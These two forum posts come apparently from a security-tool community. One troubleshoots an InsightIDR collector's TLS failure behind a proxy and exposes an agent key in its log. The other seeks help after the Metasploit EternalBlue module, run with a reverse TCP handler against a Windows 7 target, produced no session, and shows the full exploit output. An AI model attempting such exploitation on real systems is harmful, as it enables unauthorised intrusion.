Insight Collector via Web Proxy

Hello, we are running a POC of InsightIDR and we are getting the following message (in bootstrap.log) when we try to activate a collector.

    Mar 16, 2018 9:10:55 AM com.rapid7.razor.collector.bootstrap.impl.JavaLogHelper$Logger info
    INFO: RegistrationManager attempting to connect to the server: https://eu.data.insight.rapid7.com/api/1/collector/register
    Mar 16, 2018 9:10:55 AM com.rapid7.razor.collector.bootstrap.impl.JavaLogHelper$Logger info
    INFO: **** Agent key for this Collector is: 311aa03d-7c6f-446b-a015-c85a113b4ff8
    Mar 16, 2018 9:10:55 AM com.rapid7.razor.collector.bootstrap.impl.JavaLogHelper$Logger error
    SEVERE: Registration process failed with exception
    javax.net.ssl.SSLHandshakeException: sun.security.validator.ValidatorException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
        at sun.security.ssl.Alerts.getSSLException(Unknown Source)
        at sun.security.ssl.SSLSocketImpl.fatal(Unknown Source)
        at sun.security.ssl.Handshaker.fatalSE(Unknown Source)
        at sun.security.ssl.Handshaker.fatalSE(Unknown Source)
        at sun.security.ssl.ClientHandshaker.serverCertificate(Unknown Source)
        at sun.security.ssl.ClientHandshaker.processMessage(Unknown Source)
        at sun.security.ssl.Handshaker.processLoop(Unknown Source)
        at sun.security.ssl.Handshaker.process_record(Unknown Source)
        at sun.security.ssl.SSLSocketImpl.readRecord(Unknown Source)
        at sun.security.ssl.SSLSocketImpl.performInitialHandshake(Unknown Source)
        at sun.security.ssl.SSLSocketImpl.startHandshake(Unknown Source)
        at sun.security.ssl.SSLSocketImpl.startHandshake(Unknown Source)
        at sun.net.www.protocol.https.HttpsClient.afterConnect(Unknown Source)
        at sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(Unknown Source)
        at sun.net.www.protocol.http.HttpURLConnection.getInputStream(Unknown Source)
        at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(Unknown Source)
        at java.net.URL.openStream(Unknown Source)
        at com.rapid7.razor.collector.bootstrap.impl.RegistrationManager.registerWithServer(RegistrationManager.java:203)
        at com.rapid7.razor.collector.bootstrap.impl.RegistrationManager.doRegister(RegistrationManager.java:108)
        at com.rapid7.razor.collector.bootstrap.impl.RegistrationManager.checkRegistration(RegistrationManager.java:72)
        at com.rapid7.razor.collector.bootstrap.impl.BootstrapProcess.call(BootstrapProcess.java:46)
        at java.util.concurrent.FutureTask$Sync.innerRun(Unknown Source)
        at java.util.concurrent.FutureTask.run(Unknown Source)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
        at java.lang.Thread.run(Unknown Source)

Wireshark gives me:

    59 30.875484 <my collector ip> <my proxy ip> TLSv1.2 61 Alert (Level: Fatal, Description: Certificate Unknown)

We have allowed SSL pass-through and the server can get to the site. Any ideas?

insightidr

Posted by Martin Austin about a year ago


Eternal Blue problem

I have this problem with windows/smb/ms17_010_eternalblue. I use:

    Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux

Output:

    [*] Started reverse TCP handler on "Lhost:port"
    [*] "Rhost IP:port" - Connecting to target for exploitation.
    [+] "Rhost IP:port" - Connection established for exploitation.
    [+] "Rhost IP:port" - Target OS selected valid for OS indicated by SMB reply
    [*] "Rhost IP:port" - CORE raw buffer dump (38 bytes)
    [*] "Rhost IP:port" - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
    [*] "Rhost IP:port" - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
    [*] "Rhost IP:port" - 0x00000020  50 61 63 6b 20 31                                Pack 1
    [+] "Rhost IP:port" - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] "Rhost IP:port" - Trying exploit with 12 Groom Allocations.
    [*] "Rhost IP:port" - Sending all but last fragment of exploit packet
    [*] "Rhost IP:port" - Starting non-paged pool grooming
    [+] "Rhost IP:port" - Sending SMBv2 buffers
    [+] "Rhost IP:port" - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] "Rhost IP:port" - Sending final SMBv2 buffers.
    [*] "Rhost IP:port" - Sending last fragment of exploit packet!
    [*] "Rhost IP:port" - Receiving response from exploit packet
    [-] "Rhost IP:port" - Did not receive a response from exploit packet
    [*] "Rhost IP:port" - Sending egg to corrupted connection.
    [-] "Rhost IP:port" - Errno::ECONNRESET: Connection reset by peer
    [*] Exploit completed, but no session was created.

Posted by Jhon Dale about a year ago